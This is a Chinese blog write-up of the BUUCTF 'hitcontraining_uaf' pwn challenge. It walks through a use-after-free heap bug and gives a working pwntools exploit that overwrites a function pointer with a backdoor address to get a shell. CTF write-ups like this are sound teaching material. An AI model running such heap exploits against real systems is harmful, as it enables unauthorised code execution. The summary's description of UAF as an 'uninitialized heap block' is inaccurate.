hitcontraining_uaf

最新推荐文章于 2024-01-12 17:55:55 发布
原创 最新推荐文章于 2024-01-12 17:55:55 发布 · 289 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #网络安全 #安全

该博客详细介绍了如何利用未初始化的堆块(Use-After-Free, UAF)漏洞在程序中执行getshell。通过分析程序功能,发现存在对chunk的控制机会,通过申请、释放和重新分配内存,最终成功将print_note_content函数指向getshell的地址,实现远程命令执行。

hitcontraining_uaf

使用checksec查看:
在这里插入图片描述
看题目名,应该是用UAF去解题

拉进IDA中看下add函数:
在这里插入图片描述
可以发现,add一个note会malloc两个堆,第一个堆不可控,大小默认为0x8,储存函数。第二个堆是用户可控的context。

本来是想看Edit函数的,结果发现这个程序并没有这个函数,给的是print:
在这里插入图片描述
print调用的是add_note中第一个chunk指针指向的内容,也就是print_note_content进行输出操作。

那就只能从print_note_content下手了。

在程序中查找一下字符串,可以发现/bin/sh,跟进查看函数:
在这里插入图片描述
拿到函数的地址:0x8048945

接下来思路就很明了了

  • 申请两个chunk
  • free掉这两个chunk
  • 再申请一个chunk,大小为0x8,这样就能将刚刚申请两个chunk时系统自动申请的两个chunk拿来用了,context处写入getshell的地址:0x8048945
  • 调用print_not就变成了getshell

exp:

from pwn import*

# r = remote('node4.buuoj.cn',25488)
r = process('../buu/hitcontraining_uaf')

def add(size,content):
  r.sendlineafter('choice :','1')
  r.sendlineafter('Note size :',str(size))
  r.sendlineafter('Content :',content)

def delete(idx):
  r.sendlineafter('choice :','2')
  r.sendlineafter('Index :',str(idx))

def printf(idx):
  r.sendlineafter('choice :','3')
  r.sendlineafter('Index :',str(idx))

shell_addr = 0x8048945

add(0x10,'M')
add(0x10,'M')
delete(0)
delete(1)
add(0x8,p32(shell_addr))
printf(0)

r.interactive()
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 1047
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
【CTF】【PWN】【UAF】【萌新友好向wp】hitcontraining_uaf
m0_50819561的博客
10-08 525
这题的反编译有点阴间。 这是add函数,add一次会malloc两个chunk。 同时要注意,这里的notelist是一个二维数组。notelist[i]表示的其实是notelist[i][0].后面还有一个notelist[i][1]。 我们看notelist[i],他被赋值为print_note_content这个地址的函数。 notelist[i][1]才是真正存放chunk的content的地方。 为什么要把notelist[i]赋值为print_note_content这个地址的函数呢? 下面这
[BUUCTF-pwn]——hitcontraining_uaf
Y_peak的博客
03-10 446
[BUUCTF-pwn]——hitcontraining_uaf 题目地址:https://buuoj.cn/challenges#hitcontraining_uaf 题目给了提示,一个利用UAF漏洞的题目 还是先checksec一下 在IDA中,三个比较关键的函数 我们可以发现add会申请两次内存,第一次申请8个字节,前四个字节指向print_note_content这个函数, 后四个字节指向我们写入的字符串(count会加1) delete则会将刚才申请的两块空间给删除(count不会减一
buuctf hitcontraining_uaf
cainiao78777的博客
04-12 388
会把指针堆块1重新分配给我们,context堆块会把指针堆块0分配给我们(因为我们申请一个堆块实际上是申请两个堆块(一个指针堆块,一个context堆块))程序是先申请一个指针堆块,这个指针堆块的大小为8字节,前四字节存储的是puts函数的指针,后四字节存储的是要申请的堆块内容指针就是相当于这样。3.打印堆块内容,这段代码会把指针堆块的第一个指针来执行函数,如果把第一个指针修改为后门函数指针,就能getshell。2.释放堆块,这个操作,在释放堆块之后,并未把指针置零,所以存在uaf漏洞。
BUUCTF-PWN-hitcontraining_uaf
Rt1Text的博客
03-05 847
32位的堆题,只开了一个保护,应该很简单,不会很难。
buu|hitcontraining_uaf 1
m0_64236521的博客
07-09 272
hitcontraining_uaf 1 这里一次会申请两个堆,其中第一个堆放着print_note_content 前4个字节位是print_note_content函数地址,这个堆块儿存在了notelist中 在执行print_notet时,会调用notelist里存储print_note_content函数地址的堆块儿,及我们只需将notelist里堆块儿存的print_note_content函数地址改成后门函数地址即可 申请两个堆块儿 释放掉 0x10里有两个堆,都是之前存...
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 426
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜单;
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 2260
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
hitcontrainingUAF之我见
TedLau的博客
06-16 381
hictontrainingUAF,太菜学了几天才懂这里的门道。我觉得我理解了这个题...继续学吧!
pwnhitcontraining_uaf --堆利用之uaf
最新发布
question55的博客
01-12 551
a。
hitcontraining_uaf【write up】
m0_73756460的博客
01-25 201
buu刷题hitcontraining_uaf【write up】
Java领域下的2021_UAF_SE_Nhom06项目探讨
- **2021_UAF_SE_Nhom06**:标题中的“2021”表明这是一个与年份相关的项目或文档,它可能在2021年完成或进行了重要更新。“UAF”可能指的是“Use After Free”错误,这是一种常见的安全漏洞,属于内存安全问题。在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值